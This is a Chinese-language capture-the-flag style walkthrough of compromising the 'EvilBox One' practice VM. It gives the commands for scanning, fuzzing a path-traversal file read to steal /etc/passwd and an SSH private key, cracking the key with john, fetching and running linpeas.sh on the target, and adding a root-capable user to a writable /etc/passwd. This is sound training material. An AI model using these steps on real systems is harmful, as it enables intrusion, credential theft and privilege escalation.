EVILBOX ONE靶机复现
准备工作
点我看靶机官方网页
首先将靶机和kali设置到一个网段内
信息搜集
首先对整个网段进行一个简单的扫描
nmap 10.0.2.0/24
发现靶机ip
这里在进行对其ip进行一个详细扫描
nmap -A -sV -p- 10.0.2.9
扫描完成
- 这里发现开放
22
,80
端口
对其80端口进行访问
发现这是一个apsche的默认界面 这时利用扫描工具对其网址进行一个目录扫描
目录扫描
这里我运用的则是gobuster
,和dirsearch
两个工具进行的扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt --url http://10.0.2.9
dirsearch -u http://10.0.2.9
扫描发现有两个可疑目录robots.txt
,secret
分别对其进行访问
访问发现robots.txt
目录并查看源码并无可用信息
对另外一个目录进行访问
- 这里发现则为一个空白的网页,这是猜测此目录下面还有一些东西,再次对其进行一个扫描
这里我直接用的gobuster
进行扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt --url http://10.0.2.9/secret/
扫描完成这里发现一个目录exil.php
对其进行访问发现仍然为一个空白页面
模糊测试
首先在url中写入
http://10.0.2.9/secret/evil.php?FUZZ=../../../../../../../../../../etc/passwd
wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.9/secret/evil.php?FUZZ=../../../../../../../../../../etc/passwd --hh 0
这里扫描发现command
将其url中的FUZZ
更改为扫描出来的command
发现可以访问到 /etc/passwd
文件
查看源码
这里发现一个用户mowree
注:最下面的Jerry
用户是我之前打的时候建立的
因上面信息搜集已知有ssh,此时尝试查看一下mowree
用户的私钥
将url中的/etc/passwd
更改为/home/mowree/.ssh/id_rsa
- 拿到私钥对其进行解密
首先将私钥写入到一个文件中
touch id # 创建文件id
vim id # 将刚刚页面中的私钥复制到此文件中
然后利用ssh2john
工具对此文件进行重定向,然后对其进行密码爆破
ssh2john id > tmp # 将id文件重定向到tmp里
john tmp
密码爆破成功为unicorn
这是直接进行ssh登录
上面已知用户名为mowree
ssh mowree@10.0.2.9 -i id
这里发现报错了
此时需要修改一下id文件权限
此时权限为644
因为权限太高了需要将权限修改为600
修改完成再次登录发现登录成功
chmod 600 id # 修改id权限为600
ssh mowree@10.0.2.9 -i id
提权
这里我尝试了一些的常见的提权方式,这里并没有发现可以提权的
这里我运用一款工具直接跑了一下查看一些常见的漏洞
工具名为linpeas.sh
也可以自行到github查找
wget https://github.com/ankit-d68/linpeas/releases/download/linpeas.sh/ linpeas.sh
# 靶机中直接下载
输入命令
bash linpeas.sh
扫描发现/etc/passwd
存在漏洞
这里对/etc/passwd
文件进行查看
发现读写权限
对其进行写入一个账户进行提权
首先在本地制作一个hash密码
openssl passwd -1 -salt Jerry Jerry # Jerry 第一个则为用户名第二个则为密码
然后对其passwd
1进行编写写入一个新的用户
将刚刚本地生成的密码直接复制到用户名后面
然后保存
直接切换用户登录刚刚写入的用户